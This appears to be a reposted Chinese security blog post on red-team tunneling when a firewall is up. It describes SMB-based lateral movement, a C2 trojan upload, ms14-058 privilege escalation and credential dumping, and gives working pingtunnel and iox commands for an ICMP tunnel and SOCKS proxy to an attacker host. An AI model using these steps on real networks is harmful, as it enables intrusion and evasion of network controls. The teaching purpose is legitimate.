文章总结: 文档介绍在防火墙开启时利用SMB协议搭建隧道的方法,SMB默认入站开放,适用于密码喷射或已知口令下的横向移动。流程包括在web服务器上传木马、提权、获取凭证,并通过pingtunnel和iox代理实现内网穿透,最终通过proxifier访问内网服务。
综合评分: 88
文章分类: 内网渗透,红队,WEB安全,渗透测试,实战经验
防火墙开启状态下隧道搭建(二)
原创
摆烂的beizeng
土拨鼠的安全屋
2025年12月7日 10:00
山东
SMB-开防火墙入站只445:
img
可用于文件打印和共享
smb和上面两个icmp和dns不一样,他是为了解决入站问题
SMB一般在防火墙入站默认是开启的,判断目标端口是否开放
适用场景:防火墙放行的入口打不下利用放行的SMB移动获取权限
利用条件:密码喷射或已知口令的情况下直接正向SMB横向移动拿下
大致流程:
域控192.168.3.21
web服务器ip192.168.3.31
sql服务器ip 192.168.3.33
web服务器开放445端口,web服务器拿到shell之后,上传smb隧道木马,c2上线,ms14-058提权从webadmin到system,再cs获取密码凭证,再新建web反向监听地址192.168.3.31端口为6666 ,再横向到3.33,web服务器中转代理当作跳板机
1、2场景后续穿透问题
1、Pingtunel配合iox代理Socks内网穿透
2、dnscat2(DNS)配合上线
C2:
接收客户端传递的ICMP
./pingtunnel -type server -noprint 1 -nolog 1 -key 000000
将本地4455转至5566端口
./iox proxy -l 4455 -l 5566
Web
将本地2222的TCP封装IMCP给192.168.139.141:4455
pingtunnel -type client -l 127.0.0.1:2222 -s 192.168.139.141 -t 192.168.139.141:4455 -tcp 1 -noprint 1 -nolog 1 -key 000000
建立SockS节点绑定2222端口:
iox.exe proxy -r 127.0.0.1:2222
此时在windows上proxifier可以加载节点配置就可以访问web服务
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:土拨鼠的安全屋 摆烂的beizeng《防火墙开启状态下隧道搭建(二)》